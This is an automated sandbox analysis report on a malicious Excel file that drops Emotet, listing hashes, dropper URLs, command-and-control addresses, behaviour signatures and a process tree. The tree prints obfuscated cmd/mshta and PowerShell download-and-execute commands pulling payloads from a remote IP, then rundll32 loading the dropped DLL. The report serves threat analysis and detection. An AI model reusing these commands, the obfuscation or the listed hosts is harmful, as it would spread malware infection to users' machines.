Analysis

  • max time kernel
    124s
  • max time network
    160s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:38

General

  • Target

    KTU-010122 XSIJ-280122.xls

  • Size

    47KB

  • MD5

    f7fec4ec166a17362b23b07e1ff06a5d

  • SHA1

    2704ab7af1ec1d85771bdae6eb38ad89d65c8b4a

  • SHA256

    65ea61f3ce9199cca575bba5980ce844369c7a899ee509233bdebde2c92524c1

  • SHA512

    c761ae7777ca2357b220f50330d61168c16c5df70a80eea2b320870652ceadb357b224377c5897830f3581b2490646f47ba204f1a05464350923991aaa008740

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\KTU-010122 XSIJ-280122.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3184
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      PID:1720
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:2644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3852
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:928
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1068
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1804
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Acetizlm\zptopltuk.tjv",GIrMPGlODQkH
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:696
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Acetizlm\zptopltuk.tjv",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:420
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2644 -s 1908
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1168

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    4ee771426984b1a6b48d2522776c65a2

    SHA1

    cbb4bdf131584d811fc7464143acfb7e428fd434

    SHA256

    862b450eba791b44f14bb1a0e475bab15a418067bac695cc00244127b1cf323a

    SHA512

    2a50fa6b123d6fba794a83bd0a9697d29fed6d8365bc221e0ecbbb0d3461be899af37035cf4f510c31dd24683b3197bd255d25d5239ab6a4599c5268bc4aa356

  • \ProgramData\QWER.dll
    MD5

    4ee771426984b1a6b48d2522776c65a2

    SHA1

    cbb4bdf131584d811fc7464143acfb7e428fd434

    SHA256

    862b450eba791b44f14bb1a0e475bab15a418067bac695cc00244127b1cf323a

    SHA512

    2a50fa6b123d6fba794a83bd0a9697d29fed6d8365bc221e0ecbbb0d3461be899af37035cf4f510c31dd24683b3197bd255d25d5239ab6a4599c5268bc4aa356

  • \ProgramData\QWER.dll
    MD5

    4ee771426984b1a6b48d2522776c65a2

    SHA1

    cbb4bdf131584d811fc7464143acfb7e428fd434

    SHA256

    862b450eba791b44f14bb1a0e475bab15a418067bac695cc00244127b1cf323a

    SHA512

    2a50fa6b123d6fba794a83bd0a9697d29fed6d8365bc221e0ecbbb0d3461be899af37035cf4f510c31dd24683b3197bd255d25d5239ab6a4599c5268bc4aa356

  • memory/696-1843-0x0000000003140000-0x0000000003165000-memory.dmp
    Filesize

    148KB

  • memory/1804-1826-0x0000000004EB0000-0x0000000004ED5000-memory.dmp
    Filesize

    148KB

  • memory/1804-1837-0x0000000005070000-0x0000000005095000-memory.dmp
    Filesize

    148KB

  • memory/1804-1847-0x00000000052A0000-0x00000000052C5000-memory.dmp
    Filesize

    148KB

  • memory/1804-1841-0x0000000005130000-0x0000000005155000-memory.dmp
    Filesize

    148KB

  • memory/1804-1839-0x00000000050D0000-0x00000000050F5000-memory.dmp
    Filesize

    148KB

  • memory/1804-1828-0x0000000004F90000-0x0000000004FB5000-memory.dmp
    Filesize

    148KB

  • memory/1804-1821-0x0000000002E00000-0x0000000002E25000-memory.dmp
    Filesize

    148KB

  • memory/3184-115-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB

  • memory/3184-116-0x00007FFD467F0000-0x00007FFD46800000-memory.dmp
    Filesize

    64KB

  • memory/3852-1496-0x000002A2485A0000-0x000002A2485C2000-memory.dmp
    Filesize

    136KB

  • memory/3852-1545-0x000002A2304A0000-0x000002A248660000-memory.dmp
    Filesize

    385.8MB

  • memory/3852-1571-0x000002A248C70000-0x000002A248CE6000-memory.dmp
    Filesize

    472KB

  • memory/3852-1546-0x000002A248760000-0x000002A24879C000-memory.dmp
    Filesize

    240KB

  • memory/3852-1680-0x000002A2304A0000-0x000002A248660000-memory.dmp
    Filesize

    385.8MB

  • memory/3852-1600-0x000002A2304A0000-0x000002A248660000-memory.dmp
    Filesize

    385.8MB